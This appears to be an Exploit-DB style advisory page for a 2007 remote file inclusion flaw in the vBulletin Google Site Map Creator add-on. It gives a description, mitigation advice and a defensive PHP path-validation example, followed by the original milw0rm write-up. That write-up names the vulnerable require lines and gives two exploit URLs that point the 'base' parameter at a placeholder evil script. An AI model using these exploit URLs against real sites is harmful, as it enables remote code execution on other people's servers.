vendor: Google Site Map Creator
by: Host4vb.com & Cold z3ro
CVSS: 7.5 HIGH
Remote File Include
CWE: 98
Product Name: Google Site Map Creator
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

vBulletin Google Site Map Creator (base) Remote File Include Vulnerability

The vBulletin Google Site Map Creator script is vulnerable to remote file inclusion. This vulnerability allows an attacker to include and execute arbitrary files from remote servers, potentially leading to remote code execution.

Mitigation:

Upgrade to a patched version of the script or apply a security patch provided by the vendor. Ensure that input validation and sanitization are implemented to prevent remote file inclusion vulnerabilities.
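
The input-validation advice above, applied to the `require $base."includes/config.php";` line quoted in the raw advisory on this page. This is an added example, not the script's or the vendor's code: the helper name `vbg_include_path` and the temporary demo directory are hypothetical, and it assumes `$base` is not assigned before the `require`, so that a request parameter can populate it (for instance with `register_globals` enabled).

```php
<?php
// Added example (not the script's own code). Pattern quoted in the advisory:
//     require $base."includes/config.php";
// Assumed: $base is not assigned before that line, so a request-supplied
// value decides what is included. The hardened form fixes the base server-side.

/**
 * Resolve $relative under the fixed directory $baseDir (hypothetical helper).
 * Throws instead of returning a path that is remote or outside $baseDir.
 */
function vbg_include_path(string $baseDir, string $relative): string
{
    $root = realpath($baseDir);
    if ($root === false) {
        throw new RuntimeException("base directory missing");
    }
    // Refuse stream wrappers and URLs (http://, ftp://, php://, data:, ...)
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative)) {
        throw new RuntimeException("wrapper or URL rejected: $relative");
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    $full = realpath($prefix . $relative);
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("path outside base rejected: $relative");
    }
    return $full;
}

// Constructed demo: a throwaway directory standing in for the script directory.
$dir = sys_get_temp_dir() . '/vbg_demo_' . getmypid();
mkdir($dir . '/includes', 0700, true);
file_put_contents($dir . '/includes/config.php', "<?php return 'config loaded';\n");

// The base is chosen by the server (in the real script: __DIR__), never taken
// from $_GET, $_REQUEST or an uninitialised global.
$result = require vbg_include_path($dir, 'includes/config.php');
echo $result, "\n";

foreach (['http://example.invalid/x', '../../etc/passwd'] as $bad) {
    try {
        vbg_include_path($dir, $bad);
        echo "UNEXPECTED: accepted $bad\n";
    } catch (RuntimeException $e) {
        echo "blocked: ", $e->getMessage(), "\n";
    }
}
unlink($dir . '/includes/config.php');
rmdir($dir . '/includes');
rmdir($dir);
```

Independently of the code change, keeping `allow_url_include = Off` in `php.ini` stops `require` and `include` from fetching URLs at all.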

Exploit-DB raw data:

=============================================

vBulletin Google Site Map Creator (base) Remote File Include Vulnerability

=============================================
Found by : Host4vb.com & Cold z3ro
Contact : Admin@host4vb.com , Cold-z3ro@hotmail.com
Homepage : Host4vb.com , Hack-Teach.Org
=============================================
Script : http://forum.time2dine.co.nz/seo-vbulletin/vbulletin-google-site-map-3976.html
=============================================
File :
/vbgsitemap-vbseo.php  <=  Line 5
require $base."includes/functions_vbseo.php";
=============================================
File :
/vbgsitemap-config.php <= Line 139
require $base."includes/config.php";
=============================================
Exploit :
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?base=Evil-Script?
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?base=Evil-Script?
==============================================
Greets To : Xp10.com , Hack-Teach Members , All Arabs Hosting , Sniper-sa.com , sm4host.com
Thanx: Mohandko , Alkomandoz Hacker , Mogatil , The Viper , The Wolf Ksa , Dr.Exe , Pro Hackers
Thanx: Green eyas amor , Titanichacker , hacaaar , Hack Back , Mohammad Sallah , Unix Hacker
       RoMaNcYxHaCkEr , mR wEsAm X , Mr.E-vil
Thanx: Team Hell Members (ConviCt & jEdDaWi & Black Shell & Hackers Cool & Dr.killer & Red Hat)

# milw0rm.com [2007-05-25]